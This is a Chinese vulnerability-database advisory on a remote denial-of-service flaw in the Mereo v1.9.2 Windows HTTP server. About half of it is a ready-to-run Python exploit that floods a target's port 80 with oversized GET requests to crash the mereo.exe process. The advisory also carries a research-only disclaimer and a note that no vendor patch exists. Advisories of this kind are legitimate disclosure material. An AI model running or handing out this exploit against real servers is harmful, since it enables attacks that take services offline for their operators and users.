Mereo HTTP请求远程拒绝服务漏洞
- 发表于
- Vulndb
发布时间:2010-08-30
影响版本:Mereo v1.9.2
漏洞描述:
Mereo是运行在Windows平台上的小型HTTP服务器。
远程攻击者可以通过向Mereo服务器发送恶意HTTP请求导致mereo.exe进程崩溃。
<*参考
CwG GeNiuS (cwggenius@gmail.com)
*>
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
#!/usr/bin/python ########################################################################### # # Title: Mereo v1.9.2 Remote HTTP Server DoS (0day) # By: CwG GeNiuS # Email: cwggenius [at] gmail [dot] com # Tested: XPSP3 # Download: http://www.ohloh.net/p/mereo # ############################################################################ import socket, sys payload ="GET /"; payload+="X" * 10000; payload+=" HTTP/1.1\r\n\r\n"; count = 1; try: while (count < 100): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print ("[*] Connecting to httpdx server."); s.connect((sys.argv[1], 80)); print ("\n[*] Sending command.\n"); s.send(payload); s.close(); count = count+1; print count; except: print "Successfully Crashed!"; |
安全建议:
厂商补丁:
Mereo
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.assembla.com/wiki/show/mereo
